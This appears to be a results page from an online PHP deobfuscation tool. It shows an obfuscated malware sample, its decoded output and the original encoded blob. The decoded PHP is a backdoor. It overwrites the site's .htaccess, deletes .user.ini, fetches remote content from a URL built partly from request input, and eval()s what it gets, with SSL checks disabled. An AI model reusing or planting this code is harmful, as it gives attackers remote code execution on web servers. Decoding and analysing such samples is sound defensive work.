Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzuncompress(base64_decode('eJyNVH9ME2cYZgwZYyObDqdTcSc2ay/r8AotRc4u1nIFtKVNWxTlyq20X..
Decoded Output download
<?php error_reporting(E_ALL ^ E_NOTICE);
define('', '');
$GLOBALS[] = explode('|||', gzinflate(substr('
Rr0v`/\BH@{E7i>UY=:ZjS
,PY{A p(r4IK\1..27
vrX}[3[D0e[0sv;7 MnKh^^45tzF$4VM+Pt=/FX3Z}y&j|S#v#DVCT\'ixgS$\Lyq9M
8 "yCtlk#5$MMePI O}O<:_c)
[email protected]}
t pT:)CXC7P!HaJl<${scWJ', 0x0a, -8)));
error_reporting(0);
@ini_set($GLOBALS{}[0], NULL);
@ini_set($GLOBALS{} {
0x001
}, 0);
@ini_set($GLOBALS{}[0x0002], 0);
echo $GLOBALS{} {
0x00003
};
if (isset($_GET[$GLOBALS{}[0x000004]])) {
$PvDde = base64_decode($GLOBALS{} {
0x05
});
$dt68w = $_SERVER[$GLOBALS{}[0x006]];
unlink("{$dt68w}/.htaccess");
if (function_exists($GLOBALS{} {
0x0007
})) {
file_put_contents("{$dt68w}/.htaccess", $PvDde);
} else {
fwrite(fopen("{$dt68w}/.htaccess", $GLOBALS{}[0x00008]), $PvDde);
}
if (file_exists("{$dt68w}/.user.ini")) {
unlink("{$dt68w}/.user.ini");
}
}
function curlFoxAuto($d15uw) {
$Au0oE = curl_init();
curl_setopt($Au0oE, CURLOPT_TIMEOUT, 0x01e);
curl_setopt($Au0oE, CURLOPT_RETURNTRANSFER, !0);
curl_setopt($Au0oE, CURLOPT_URL, $d15uw);
curl_setopt($Au0oE, CURLOPT_USERAGENT, $GLOBALS{} {
0x000009
});
curl_setopt($Au0oE, CURLOPT_FOLLOWLOCATION, !0);
if (stristr($d15uw, $GLOBALS{}[0x0a])) {
curl_setopt($Au0oE, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($Au0oE, CURLOPT_SSL_VERIFYHOST, 0);
}
curl_setopt($Au0oE, CURLOPT_HEADER, !1);
return curl_exec($Au0oE);
}
$PmArP = $GLOBALS{} {
0x00b
} . $_GET[$GLOBALS{}[0x000c]];
if (empty($_GET[$GLOBALS{} {
0x0000d
}
])) {
exit;
} else {
$pOXsz = file_get_contents($PmArP);
if (empty($pOXsz)) {
$pOXsz = curlFoxAuto($PmArP);
}
$pOXsz = str_replace($GLOBALS{}[0x00000e], $GLOBALS{} {
0x0f
}, $pOXsz);
$pOXsz = str_replace($GLOBALS{}[0x0010], $GLOBALS{} {
0x0f
}, $pOXsz);
eval($pOXsz);
}
Did this file decode correctly?
Original Code
eval(gzuncompress(base64_decode('eJyNVH9ME2cYZgwZYyObDqdTcSc2ay/r8AotRc4u1nIFtKVNWxTlyq20X/G0tPV6LcVy25wLmToZM8zgNrI/nDPooobp5kw0Q5kOf6BOBRlKFopxiWEbYlFhLvuuLVGpNrvk8l3ufd7n/fE974sAhnExFAPcLoalnVUiglJqNBUEVaIzFasIFLcBO+0EImGnUIwI9w71CVFcUKjRLVFqjOWdZkSBAL/b4bJBRF1i3TN1SRBWtZ522h0WFog83koPy4iEr29JSQg/qZ8Z+pjfsJdbfGOX91/Y8lxz1zsbF5DkkqJN7R0HFw8EHgwMEzNPtd0YnjK7/pP9GXL60tulO1e2KPJXDa2Zcil996vH/w0FQydCxjTxVf3KWwHldmT8n4ZX3IdEzIvSP8+cLb65jCRPpvT1p1+VNJyfmtX27L6xrIafpp/NlqdtmzN4M6nfx5TdGPyOayv/PufugfICrGsczBo8UN6BeYaSfHiSHDk8vf35rRnaFGfv71OXfbz6g2DF380z91VIZZ3s+qOv9apbenqOnRF89NJM6c7O5RtSxloztO09P+/9Zc+bY9e6T+rZFzpGFAta+9XDw2Xd51pympK7VoUyuGmz7iTX3nljuHvNcPB4nXH+Vt/8gh17ljerTM23H+wMksI22l/V13jBKCBJTe26gYu3FmpH76RuSvwi79MPkfPbR09kptee7mk9Pa76ga13nFs7X3ZZoL2Srm3+Fhya1qS/Wpx8Y8ttZEzH3dPNXRTsy5/9eT11+JYVTb3f7T8e/Ct9c9ORfvXIH8GqdbuGdk05Vk2t/vHmlaE1u8t+fXf/wcvzFl9Yuvkas+7LnuoHIctpX+/AsvcbtW1cKhtCRt07NrQkJpu+OnLxbv6pa1/vRlV3W+eWqeQdg42z9KE5CfOKLNeXtvU6NmaMLOr8RnC/L+DZZr09o/n60fbu/nPvJY6smLH0XmJCglCM+TGLGHkrD0VRPC11svQwFF9MO2nKA1jRhMYCnVw5ZhaXlGo0T7YGICcm4cRPdYZmLNvM24F1tQuZ7IphORxO20W0J+xJFRKm8hh/DJOazSgaEOh9BTagqLR4QK6UsgErL/xJjDIOToiNzc2rUQgoI2FYThhiCHPNZtzrdNDOtaLMQATMkTI5KcslJTKM9MulpD9XQkqkOfDMgaeMlMDTL8/JRPlk7V6nlaVdTgr4aQ/riekHJudgtnbaASi3l6WsLicLnBAXLxgfKPJGgsE3UxwpGMU54PCAgL2GoeFU211u4HyEy59t58n8uXnQKZYMZh0li2lrnhl9GIKvi884WtNjufqzAeSJcoW7kR3+J5HxscJnJqz4ST0Nw6JpRNJ56CoJ9wC64hw30VPE6mUcapdf6WVdIoFNIvPWwItXejEXoeBNFFQZK0Lx8DfUjMsNZRM2i1WlBo1Ob6JMxVpCV2ri5S4BcZEGwlRqKDEZlCVGNWEQz8PiouEhjmYUFwZVpywkSkziWLFjC7m4vmqdRqNbodGplKZiXUk4IXgvcInT/CKPBJ98kRZ+NOJwGo0aCk5BsXqlnoBFxq/xIbhIZzTxYC4OuohQFvB9k6A4A1gvE7k9KCFgjUKhv0BfrWT0isnNqOSQrKfMuxXOJywbVLvZ2tidEG2ljePrhmplo+MhcOvKPOsVYRFXgUfGLpIA+ghlGMkvlIjLY5KLgrmoDfad35EOixXELjYMA+bJt2znxFF+/H9QSLB4BMBncUxki3P/AbUxDAQ=')));
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | a18268d7f22524558adcc0eef8e47ac0 |
Eval Count | 1 |
Decode Time | 101 ms |